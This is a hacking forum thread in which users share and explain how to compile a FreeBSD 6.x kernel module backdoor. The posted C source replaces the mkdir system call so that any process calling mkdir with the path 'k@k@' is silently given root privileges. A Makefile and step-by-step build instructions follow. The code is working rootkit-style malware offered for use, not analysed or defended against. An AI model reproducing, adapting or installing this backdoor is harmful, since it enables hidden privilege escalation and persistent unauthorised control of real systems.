KLD backdoor for 6.x

[handsomeboy]

I found nice papers about KLD writing from THC and PHRACK, but they are too old and it can't be compiled under 6 or 7 FreeBSD brunches. I found module ... but how to compile it right?

The simply Kernel module d0r

######################################################################
####################### FreeBSD 6.series like kld d0r#################
####################### payhash ([email protected]) #################
####################### DarkEagle #################
####################### KAKA #################
######################################################################
########################The r00t d0r##################################
#include <sys/types.h>
#include <sys/param.h>
#include <sys/proc.h>
#include <sys/module.h>
#include <sys/sysent.h>
#include <sys/kernel.h>
#include <sys/systm.h>
#include <sys/linker.h>
#include <sys/sysproto.h>
#include <sys/sysent.h>
#include <sys/proc.h>
#include <sys/syscall.h>
#include <pthread.h>

#define KEYWORD "k@k@"

static int t00r_mkdir(struct thread *p, struct mkdir_args *uap)
{
unsigned char path[16];

copyin (uap->path, path, sizeof(path));

if (strcmp (path, KEYWORD) == 0)
{
// printf("detect syscall mkdir: %s\n", uap->path);

p->td_ucred->cr_uid = 0;
p->td_ucred->cr_svuid = 0;
p->td_ucred->cr_ruid = 0;

return (0);
}
return mkdir(p, uap);
}

static int t00r_handler (struct module *module, int cmd, void *args)
{
switch (cmd)
{ case MOD_LOAD:
sysent[SYS_mkdir].sy_call = (sy_call_t *)t00r_mkdir;
break;
case MOD_UNLOAD:
sysent[SYS_mkdir].sy_call = (sy_call_t*)mkdir;
break;
default:
return (EINVAL);
}
return (0);
}

static moduledata_t syscall_mod = {
"t00r",
t00r_handler,
NULL
};

DECLARE_MODULE(syscall, syscall_mod, SI_SUB_DRIVERS, SI_ORDER_MIDDLE);
######################################################################

############################# Makefile ###############################
SRCS = k@[email protected]
KMOD = k@k@
KO = ${KMOD}.ko
KLDMOD = t

.include <bsd.kmod.mk>
######################################################################

 

[handsomeboy]

?..................

 

[x-pert]

Copy the first part into a file named "k@[email protected]",

Then the Makefile part into a file named "Makefile"

Then, type "make" and your module should be compiled.

Source: https://www.w4ck1ng.com/board/showthread.php/local-backdoor-bsd-6-6756.html?p=29488

 

[handsomeboy]

Copy the first part into a file named "k@[email protected]",

Then the Makefile part into a file named "Makefile"

Then, type "make" and your module should be compiled.

Source: https://www.w4ck1ng.com/board/showthread.php/local-backdoor-bsd-6-6756.html?p=29488

Thanx

 

[Kalindugayan]

mata terenne ne

 

[draco]

mokak da mae ??????????